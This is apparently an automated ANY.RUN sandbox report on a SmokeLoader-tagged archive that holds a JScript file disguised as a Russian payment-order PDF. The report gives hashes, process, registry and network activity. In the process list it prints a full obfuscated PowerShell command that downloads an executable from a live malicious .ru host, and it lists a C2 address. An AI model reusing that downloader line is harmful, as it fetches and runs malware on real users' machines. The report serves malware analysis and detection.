Malware analysis i_i_10.09.2024.rar Malicious activity

Add for printing

File name:	i_i_10.09.2024.rar
Full analysis:	https://app.any.run/tasks/ccb41ee8-3603-4b81-b087-ffb6d09e90ba
Verdict:	Malicious activity
Threats:	A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection. Malware Trends Tracker >>>
Analysis date:	September 11, 2024, 09:43:43
OS:	Windows 10 Professional (build: 19045, 64 bit)
Tags:	opendir loader smokeloader
Indicators:
MIME:	application/zip
File info:	Zip archive data, at least v2.0 to extract, compression method=deflate
MD5:	BF64C4011ABF4785A25511B24C0B3459
SHA1:	4A5E081153535689F67487B5694E6C8E8EA46330
SHA256:	E77A6658A160C60BBBFB226F5418B637EDDE1A1066C9F43D61A40034B7FCCF5D
SSDEEP:	3072:XkrrW18L9xxZbpTVDTQ0IoYgT+njieeAWiDI4:XkrqWL9nppVDThIqTyjieeAhDn

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

Launch configuration

Task duration:: 300 seconds
Heavy Evasion option:
Network geolocation:: off
Additional time used:: 240 seconds
MITM proxy:: off
Privacy:: Public submission
Fakenet option:: off
Route via Tor:: off
Autoconfirmation of UAC:: on
Network:: on

Software preset

Internet Explorer 11.3636.19041.0
Adobe Acrobat (64-bit) (23.001.20093)
Adobe Flash Player 32 NPAPI (32.0.0.465)
Adobe Flash Player 32 PPAPI (32.0.0.465)
CCleaner (6.20)
FileZilla 3.65.0 (3.65.0)
Google Chrome (122.0.6261.70)
Google Update Helper (1.3.36.51)
Java 8 Update 271 (64-bit) (8.0.2710.9)
Java Auto Updater (2.8.271.9)
Microsoft Edge (122.0.2365.59)
Microsoft Edge Update (1.3.185.17)
Microsoft Office Professional 2019 - de-de (16.0.16026.20146)
Microsoft Office Professional 2019 - en-us (16.0.16026.20146)
Microsoft Office Professional 2019 - es-es (16.0.16026.20146)
Microsoft Office Professional 2019 - it-it (16.0.16026.20146)
Microsoft Office Professional 2019 - ja-jp (16.0.16026.20146)
Microsoft Office Professional 2019 - ko-kr (16.0.16026.20146)
Microsoft Office Professional 2019 - pt-br (16.0.16026.20146)
Microsoft Office Professional 2019 - tr-tr (16.0.16026.20146)
Microsoft Office Professionnel 2019 - fr-fr (16.0.16026.20146)
Microsoft Office профессиональный 2019 - ru-ru (16.0.16026.20146)
Microsoft OneNote - en-us (16.0.16026.20146)
Microsoft Update Health Tools (3.74.0.0)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (12.0.30501.0)
Microsoft Visual C++ 2013 x64 Additional Runtime - 12.0.21005 (12.0.21005)
Microsoft Visual C++ 2013 x64 Minimum Runtime - 12.0.21005 (12.0.21005)
Microsoft Visual C++ 2015-2022 Redistributable (x64) - 14.36.32532 (14.36.32532.0)
Microsoft Visual C++ 2015-2022 Redistributable (x86) - 14.36.32532 (14.36.32532.0)
Microsoft Visual C++ 2022 X64 Additional Runtime - 14.36.32532 (14.36.32532)
Microsoft Visual C++ 2022 X64 Minimum Runtime - 14.36.32532 (14.36.32532)
Microsoft Visual C++ 2022 X86 Additional Runtime - 14.36.32532 (14.36.32532)
Microsoft Visual C++ 2022 X86 Minimum Runtime - 14.36.32532 (14.36.32532)
Mozilla Firefox (x64 en-US) (123.0)
Mozilla Maintenance Service (123.0)
Notepad++ (64-bit x64) (7.9.1)
Office 16 Click-to-Run Extensibility Component (16.0.15726.20202)
Office 16 Click-to-Run Licensing Component (16.0.16026.20146)
Office 16 Click-to-Run Localization Component (16.0.15726.20202)
Office 16 Click-to-Run Localization Component (16.0.15928.20198)
PowerShell 7-x64 (7.3.5.0)
Skype version 8.104 (8.104)
Update for Windows 10 for x64-based Systems (KB4023057) (2.59.0.0)
Update for Windows 10 for x64-based Systems (KB4023057) (2.63.0.0)
Update for Windows 10 for x64-based Systems (KB4480730) (2.55.0.0)
Update for Windows 10 for x64-based Systems (KB5001716) (8.93.0.0)
VLC media player (3.0.11)
WinRAR 5.91 (64-bit) (5.91.0)
Windows PC Health Check (3.6.2204.08001)

Hotfixes

Client LanguagePack Package
DotNetRollup
DotNetRollup 481
FodMetadata Package
Foundation Package
Hello Face Package
InternetExplorer Optional Package
KB5003791
KB5011048
KB5015684
KB5033052
LanguageFeatures Basic en us Package
LanguageFeatures Handwriting en us Package
LanguageFeatures OCR en us Package
LanguageFeatures Speech en us Package
LanguageFeatures TextToSpeech en us Package
MSPaint FoD Package
MediaPlayer Package
Microsoft OneCore ApplicationModel Sync Desktop FOD Package
Microsoft OneCore DirectX Database FOD Package
NetFx3 OnDemand Package
Notepad FoD Package
OpenSSH Client Package
PowerShell ISE FOD Package
Printing PMCPPC FoD Package
Printing WFS FoD Package
ProfessionalEdition
QuickAssist Package
RollupFix
ServicingStack
ServicingStack 3989
StepsRecorder Package
TabletPCMath Package
UserExperience Desktop Package
WordPad FoD Package

Add for printing

MALICIOUS
- Run PowerShell with an invisible window
  - powershell.exe (PID: 2108)
  - powershell.exe (PID: 608)
  - powershell.exe (PID: 6768)
  - powershell.exe (PID: 1172)
  - powershell.exe (PID: 2900)
- Changes powershell execution policy (Bypass)
  - cmd.exe (PID: 6740)
  - cmd.exe (PID: 7128)
  - cmd.exe (PID: 6616)
  - cmd.exe (PID: 7092)
  - cmd.exe (PID: 6964)
- Bypass execution policy to execute commands
  - powershell.exe (PID: 2108)
  - powershell.exe (PID: 608)
  - powershell.exe (PID: 6768)
  - powershell.exe (PID: 1172)
  - powershell.exe (PID: 2900)
- Request from PowerShell which ran from CMD.EXE
  - powershell.exe (PID: 608)
  - powershell.exe (PID: 2108)
  - powershell.exe (PID: 6768)
  - powershell.exe (PID: 1172)
  - powershell.exe (PID: 2900)
- Application was injected by another process
  - explorer.exe (PID: 4552)
- Runs injected code in another process
  - TempaFY25.exe (PID: 5112)
- SMOKE has been detected (SURICATA)
  - explorer.exe (PID: 4552)
SUSPICIOUS
- Reads security settings of Internet Explorer
  - WinRAR.exe (PID: 6156)
- Uses WMI to retrieve WMI-managed resources (SCRIPT)
  - wscript.exe (PID: 1640)
  - wscript.exe (PID: 6664)
  - wscript.exe (PID: 2768)
  - wscript.exe (PID: 4364)
  - wscript.exe (PID: 5284)
- The process executes JS scripts
  - WinRAR.exe (PID: 6156)
  - explorer.exe (PID: 4552)
- The process bypasses the loading of PowerShell profile settings
  - cmd.exe (PID: 6740)
  - cmd.exe (PID: 7128)
  - cmd.exe (PID: 6616)
  - cmd.exe (PID: 7092)
  - cmd.exe (PID: 6964)
- Probably download files using WebClient
  - cmd.exe (PID: 7128)
  - cmd.exe (PID: 6740)
  - cmd.exe (PID: 6616)
  - cmd.exe (PID: 7092)
  - cmd.exe (PID: 6964)
- Runs shell command (SCRIPT)
  - wscript.exe (PID: 1640)
  - wscript.exe (PID: 6664)
  - wscript.exe (PID: 2768)
  - wscript.exe (PID: 4364)
  - wscript.exe (PID: 5284)
- Starts CMD.EXE for commands execution
  - wscript.exe (PID: 1640)
  - wscript.exe (PID: 6664)
  - wscript.exe (PID: 2768)
  - wscript.exe (PID: 4364)
  - wscript.exe (PID: 5284)
- Starts POWERSHELL.EXE for commands execution
  - cmd.exe (PID: 6740)
  - cmd.exe (PID: 7128)
  - cmd.exe (PID: 6616)
  - cmd.exe (PID: 7092)
  - cmd.exe (PID: 6964)
- Executable content was dropped or overwritten
  - powershell.exe (PID: 608)
  - powershell.exe (PID: 2108)
  - explorer.exe (PID: 4552)
  - powershell.exe (PID: 1172)
- Process requests binary or script from the Internet
  - powershell.exe (PID: 608)
  - powershell.exe (PID: 2108)
  - powershell.exe (PID: 6768)
  - powershell.exe (PID: 1172)
  - powershell.exe (PID: 2900)
- The executable file from the user directory is run by the CMD process
  - TempAXY31.exe (PID: 7012)
  - TempaFY25.exe (PID: 5112)
  - TempAXY31.exe (PID: 6948)
  - TempaFY25.exe (PID: 6784)
- Potential Corporate Privacy Violation
  - powershell.exe (PID: 2108)
  - powershell.exe (PID: 608)
  - powershell.exe (PID: 6768)
  - powershell.exe (PID: 1172)
- Executes application which crashes
  - TempAXY31.exe (PID: 7012)
- Creates file in the systems drive root
  - explorer.exe (PID: 4552)
INFO
- Reads Microsoft Office registry keys
  - WinRAR.exe (PID: 6156)
  - explorer.exe (PID: 4552)
- The process uses the downloaded file
  - wscript.exe (PID: 1640)
  - WinRAR.exe (PID: 6156)
  - wscript.exe (PID: 6664)
  - explorer.exe (PID: 4552)
  - wscript.exe (PID: 2768)
  - wscript.exe (PID: 4364)
  - wscript.exe (PID: 5284)
- Disables trace logs
  - powershell.exe (PID: 2108)
  - powershell.exe (PID: 608)
  - powershell.exe (PID: 6768)
  - powershell.exe (PID: 1172)
  - powershell.exe (PID: 2900)
- Checks proxy server information
  - powershell.exe (PID: 2108)
  - powershell.exe (PID: 608)
  - WerFault.exe (PID: 5516)
  - powershell.exe (PID: 6768)
  - explorer.exe (PID: 4552)
  - powershell.exe (PID: 1172)
  - slui.exe (PID: 6872)
  - powershell.exe (PID: 2900)
- Checks supported languages
  - TempaFY25.exe (PID: 5112)
  - TempAXY31.exe (PID: 7012)
  - TempAXY31.exe (PID: 6948)
  - TempaFY25.exe (PID: 2616)
  - TempAXY31.exe (PID: 6500)
  - TempaFY25.exe (PID: 6784)
- Reads the software policy settings
  - WerFault.exe (PID: 5516)
  - slui.exe (PID: 5276)
  - slui.exe (PID: 6872)
- Reads security settings of Internet Explorer
  - explorer.exe (PID: 4552)
  - notepad.exe (PID: 4576)
- Creates files or folders in the user directory
  - WerFault.exe (PID: 5516)
  - explorer.exe (PID: 4552)
- Manual execution by a user
  - wscript.exe (PID: 2768)
  - notepad.exe (PID: 4576)
- Sends debugging messages
  - notepad++.exe (PID: 2112)
- Script raised an exception (POWERSHELL)
  - powershell.exe (PID: 2900)

Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Add for printing

No Malware configuration.

Add for printing

TRiD

.zip	\|	ZIP compressed archive (100)

EXIF

ZIP

ZipRequiredVersion:	20
ZipBitFlag:	0x0800
ZipCompression:	Deflated
ZipModifyDate:	2024:09:09 23:15:16
ZipCRC:	0x3554975b
ZipCompressedSize:	3679
ZipUncompressedSize:	13102
ZipFileName:	Платежное Поручение в iнозеной валюте.pdf.js

No data.

Add for printing

All screenshots are available in the full report

Add for printing

Total processes

171

Monitored processes

Malicious processes

Suspicious processes

Behavior graph

Click at the process to see the details

Process information

PID

CMD

Path

Indicators

Parent process

568

\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\conhost.exe

—

cmd.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Console Window Host

Exit code:

Version:

10.0.19041.1 (WinBuild.160101.0800)

Modules

Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll

608

pOwErshEll -executionpolicy bypass -noprofile -w hidden $v1='Net.We'; $v2='bClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://haporproletioperavivo.ru/download/svc.exe','C:\Users\admin\AppData\Local\TempAXY31.exe');

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

cmd.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Windows PowerShell

Exit code:

Version:

10.0.19041.1 (WinBuild.160101.0800)

Modules

Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\atl.dll

888

"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\i_i_10.09.2024.rar.zip"

C:\Program Files\WinRAR\WinRAR.exe

—

explorer.exe

User:

admin

Company:

Alexander Roshal

Integrity Level:

MEDIUM

Description:

WinRAR archiver

Exit code:

Version:

5.91.0

Modules

Images
c:\program files\winrar\winrar.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll

1172

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

cmd.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Windows PowerShell

Exit code:

Version:

10.0.19041.1 (WinBuild.160101.0800)

Modules

Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\atl.dll
c:\windows\system32\combase.dll

1640

"C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\Rar$DIa6156.14879\Платежное Поручение в iнозеной валюте.pdf.js"

C:\Windows\System32\wscript.exe

—

WinRAR.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Microsoft ® Windows Based Script Host

Exit code:

Version:

5.812.10240.16384

Modules

Images
c:\windows\system32\wscript.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll

2108

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

cmd.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Windows PowerShell

Exit code:

Version:

10.0.19041.1 (WinBuild.160101.0800)

Modules

Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll

2112

"C:\Program Files\Notepad++\notepad++.exe" "C:\Users\admin\Desktop\Сопроводiтельни документи вiд 09.09.2024p.pdf.js"

C:\Program Files\Notepad++\notepad++.exe

explorer.exe

User:

admin

Company:

Don HO don.h@free.fr

Integrity Level:

MEDIUM

Description:

Notepad++ : a free (GNU) source code editor

Version:

7.91

Modules

Images
c:\program files\notepad++\notepad++.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll

2208

\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\conhost.exe

—

cmd.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Console Window Host

Exit code:

Version:

10.0.19041.1 (WinBuild.160101.0800)

Modules

Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll

2252

\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\conhost.exe

—

cmd.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Console Window Host

Exit code:

Version:

10.0.19041.1 (WinBuild.160101.0800)

Modules

Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll

2264

"C:\WINDOWS\system32\NOTEPAD.EXE" C:\Users\admin\AppData\Local\Temp\DESKTOP-JGLLJLD-20240308-0110.log

C:\Windows\System32\notepad.exe

—

explorer.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Notepad

Exit code:

Version:

10.0.19041.1 (WinBuild.160101.0800)

Modules

Images
c:\windows\system32\notepad.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\user32.dll

Add for printing

Total events

95 644

Read events

95 206

Write events

419

Delete events

Modification events


(PID) Process:	(4552) explorer.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:0000000000060280
Operation:	write	Name:	VirtualDesktop
Value: 1000000030304456033BCEE44DE41B4E8AEC331E84F566D2
(PID) Process:	(6156) WinRAR.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation:	write	Name:	1
Value: C:\Users\admin\Desktop\GoogleChromeEnterpriseBundle64.zip
(PID) Process:	(6156) WinRAR.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation:	write	Name:	0
Value: C:\Users\admin\AppData\Local\Temp\i_i_10.09.2024.rar.zip
(PID) Process:	(6156) WinRAR.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:	write	Name:	name
Value: 120
(PID) Process:	(6156) WinRAR.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:	write	Name:	size
Value: 80
(PID) Process:	(6156) WinRAR.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:	write	Name:	type
Value: 120
(PID) Process:	(6156) WinRAR.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:	write	Name:	mtime
Value: 100
(PID) Process:	(6156) WinRAR.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.js\OpenWithProgids
Operation:	write	Name:	JSFile
Value:
(PID) Process:	(1640) wscript.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Script\Settings\Telemetry\wscript.exe
Operation:	write	Name:	JScriptSetScriptStateStarted
Value: 2ECA120000000000
(PID) Process:	(2108) powershell.exe	Key:	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation:	write	Name:	EnableFileTracing
Value: 0

Add for printing

Executable files

Suspicious files

Text files

Unknown types

Dropped files

PID	Process	Filename		Type
2108	powershell.exe	C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive		binary
		MD5:D2EEDC927169B4A49D9CBEB4835CBD1C	SHA256:14417D9B0DDEB815DE334B43476AED31BC875837BA96791B0A2CC35FF2DFA96A
608	powershell.exe	C:\Users\admin\AppData\Local\TempAXY31.exe		executable
		MD5:AE6112B72845C6A495561783AC5EEFFD	SHA256:C514C22CCBDF3B66A902F2D02B4515920656AC636CE2A4FC683961C25702C59E
5516	WerFault.exe	C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_TempAXY31.exe_7258ae072254ecf92484efe9f7319b8723d8d4_61b0f82e_3fd3b79f-0bf4-4814-82a9-281c684fd947\Report.wer		—
		MD5:—	SHA256:—
2108	powershell.exe	C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_2djc2wth.yky.ps1		text
		MD5:D17FE0A3F47BE24A6453E9EF58C94641	SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
2108	powershell.exe	C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_tfafxomr.vj5.psm1		text
		MD5:D17FE0A3F47BE24A6453E9EF58C94641	SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
2108	powershell.exe	C:\Users\admin\AppData\Local\TempaFY25.exe		executable
		MD5:AE6112B72845C6A495561783AC5EEFFD	SHA256:C514C22CCBDF3B66A902F2D02B4515920656AC636CE2A4FC683961C25702C59E
6156	WinRAR.exe	C:\Users\admin\AppData\Local\Temp\Rar$DIa6156.14879\Платежное Поручение в iнозеной валюте.pdf.js		text
		MD5:503B0E0561D643FF0033F4DCBA2EB474	SHA256:CEE3AC99FB4FC11130707FB5FEDAA2489F8A114385F4CDDD8857952F0581A2AD
4552	explorer.exe	C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\f01b4d95cf55d32a.automaticDestinations-ms		binary
		MD5:CD490DB4CCFB190B2F149178FE5F1C6B	SHA256:5831548AABA1FE5849703C75E77D65F69E92DAD1761CB3A3C02902BF63F6D8E9
6156	WinRAR.exe	C:\Users\admin\AppData\Local\Temp\Rar$DRa6156.16424\Платежное Поручение в iнозеной валюте.pdf.js		binary
		MD5:503B0E0561D643FF0033F4DCBA2EB474	SHA256:CEE3AC99FB4FC11130707FB5FEDAA2489F8A114385F4CDDD8857952F0581A2AD
608	powershell.exe	C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_imckgkba.0dy.psm1		text
		MD5:D17FE0A3F47BE24A6453E9EF58C94641	SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Add for printing

HTTP(S) requests

TCP/UDP connections

DNS requests

Threats

HTTP requests

PID	Process	Method	HTTP Code	IP	URL	CN	Type	Size	Reputation
—	—	GET	200	184.30.21.171:80	http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl	unknown	—	—	whitelisted
3424	svchost.exe	GET	200	192.229.221.95:80	http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D	unknown	—	—	whitelisted
608	powershell.exe	GET	200	147.45.125.198:80	http://haporproletioperavivo.ru/download/svc.exe	unknown	—	—	suspicious
2108	powershell.exe	GET	200	147.45.125.198:80	http://haporproletioperavivo.ru/download/svc.exe	unknown	—	—	suspicious
3244	SIHClient.exe	GET	200	88.221.169.152:80	http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl	unknown	—	—	whitelisted
3244	SIHClient.exe	GET	200	88.221.169.152:80	http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl	unknown	—	—	whitelisted
5516	WerFault.exe	GET	200	88.221.169.152:80	http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl	unknown	—	—	whitelisted
6768	powershell.exe	GET	200	147.45.125.198:80	http://haporproletioperavivo.ru/download/svc.exe	unknown	—	—	suspicious
4552	explorer.exe	POST	404	194.58.112.174:80	http://johnfabiconinteraption.ru/index.php	unknown	—	—	unknown
2900	powershell.exe	GET	—	147.45.125.198:80	http://haporproletioperavivo.ru/download/svc.exe	unknown	—	—	suspicious

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID	Process	IP	Domain	ASN	CN	Reputation
5796	svchost.exe	20.73.194.208:443	settings-win.data.microsoft.com	MICROSOFT-CORP-MSN-AS-BLOCK	NL	whitelisted
2120	MoUsoCoreWorker.exe	20.73.194.208:443	settings-win.data.microsoft.com	MICROSOFT-CORP-MSN-AS-BLOCK	NL	whitelisted
—	—	20.73.194.208:443	settings-win.data.microsoft.com	MICROSOFT-CORP-MSN-AS-BLOCK	NL	whitelisted
—	—	184.30.21.171:80	www.microsoft.com	AKAMAI-AS	DE	whitelisted
4	System	192.168.100.255:138	—	—	—	whitelisted
4	System	192.168.100.255:137	—	—	—	whitelisted
3260	svchost.exe	40.113.103.199:443	client.wns.windows.com	MICROSOFT-CORP-MSN-AS-BLOCK	NL	whitelisted
3424	svchost.exe	20.190.159.64:443	login.live.com	MICROSOFT-CORP-MSN-AS-BLOCK	IE	whitelisted
3424	svchost.exe	192.229.221.95:80	ocsp.digicert.com	EDGECAST	US	whitelisted
5796	svchost.exe	4.231.128.59:443	settings-win.data.microsoft.com	MICROSOFT-CORP-MSN-AS-BLOCK	IE	whitelisted

DNS requests

Domain	IP	Reputation
settings-win.data.microsoft.com	20.73.194.208 4.231.128.59 40.127.240.158 52.167.249.196 51.104.136.2	whitelisted
www.microsoft.com	184.30.21.171 88.221.169.152	whitelisted
google.com	142.250.181.238	whitelisted
client.wns.windows.com	40.113.103.199 40.113.110.67	whitelisted
login.live.com	20.190.159.64 20.190.159.0 40.126.31.67 20.190.159.4 20.190.159.68 20.190.159.73 40.126.31.73 20.190.159.23	whitelisted
ocsp.digicert.com	192.229.221.95	whitelisted
haporproletioperavivo.ru	147.45.125.198	unknown
slscr.update.microsoft.com	40.127.169.103	whitelisted
fe3cr.delivery.mp.microsoft.com	20.166.126.56	whitelisted
watson.events.data.microsoft.com	104.208.16.94	whitelisted

Threats

PID	Process	Class	Message
2108	powershell.exe	Misc Attack	ET DROP Spamhaus DROP Listed Traffic Inbound group 23
2108	powershell.exe	Potential Corporate Privacy Violation	ET POLICY PE EXE or DLL Windows file download HTTP
2108	powershell.exe	Misc activity	ET INFO Packed Executable Download
2108	powershell.exe	Potentially Bad Traffic	ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
608	powershell.exe	Potentially Bad Traffic	ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
608	powershell.exe	Misc activity	ET INFO Packed Executable Download
608	powershell.exe	Potential Corporate Privacy Violation	ET POLICY PE EXE or DLL Windows file download HTTP
6768	powershell.exe	Potentially Bad Traffic	ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
6768	powershell.exe	Misc activity	ET INFO Packed Executable Download
6768	powershell.exe	Potential Corporate Privacy Violation	ET POLICY PE EXE or DLL Windows file download HTTP

5 ETPRO signatures available at the full report

Add for printing

Process	Message
notepad++.exe	VerifyLibrary: C:\Program Files\Notepad++\SciLexer.dll
notepad++.exe	VerifyLibrary: certificate revocation checking is disabled
notepad++.exe	ED255D9151912E40DF048A56288E969A8D0DAFA3
notepad++.exe	VerifyLibrary: C:\Program Files\Notepad++\updater\gup.exe
notepad++.exe	VerifyLibrary: certificate revocation checking is disabled
notepad++.exe	VerifyLibrary: error while getting certificate informations

General Info

i_i_10.09.2024.rar

BF64C4011ABF4785A25511B24C0B3459

4A5E081153535689F67487B5694E6C8E8EA46330

E77A6658A160C60BBBFB226F5418B637EDDE1A1066C9F43D61A40034B7FCCF5D

3072:XkrrW18L9xxZbpTVDTQ0IoYgT+njieeAWiDI4:XkrqWL9nppVDThIqTyjieeAhDn

Software environment set and analysis options

Launch configuration

Software preset

Hotfixes

Behavior activities

MALICIOUS

Run PowerShell with an invisible window

Changes powershell execution policy (Bypass)

Bypass execution policy to execute commands

Request from PowerShell which ran from CMD.EXE

Application was injected by another process

Runs injected code in another process

SMOKE has been detected (SURICATA)

SUSPICIOUS

Reads security settings of Internet Explorer

Uses WMI to retrieve WMI-managed resources (SCRIPT)

The process executes JS scripts

The process bypasses the loading of PowerShell profile settings

Probably download files using WebClient

Runs shell command (SCRIPT)

Starts CMD.EXE for commands execution

Starts POWERSHELL.EXE for commands execution

Executable content was dropped or overwritten

Process requests binary or script from the Internet

The executable file from the user directory is run by the CMD process

Potential Corporate Privacy Violation

Executes application which crashes

Creates file in the systems drive root

INFO

Reads Microsoft Office registry keys

The process uses the downloaded file

Disables trace logs

Checks proxy server information

Checks supported languages

Reads the software policy settings

Reads security settings of Internet Explorer

Creates files or folders in the user directory

Manual execution by a user

Sends debugging messages

Script raised an exception (POWERSHELL)

Malware configuration

Static information

TRiD

EXIF

ZIP

Video and screenshots

Processes

Behavior graph

Specs description

Process information

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Registry activity

Modification events

Files activity

Dropped files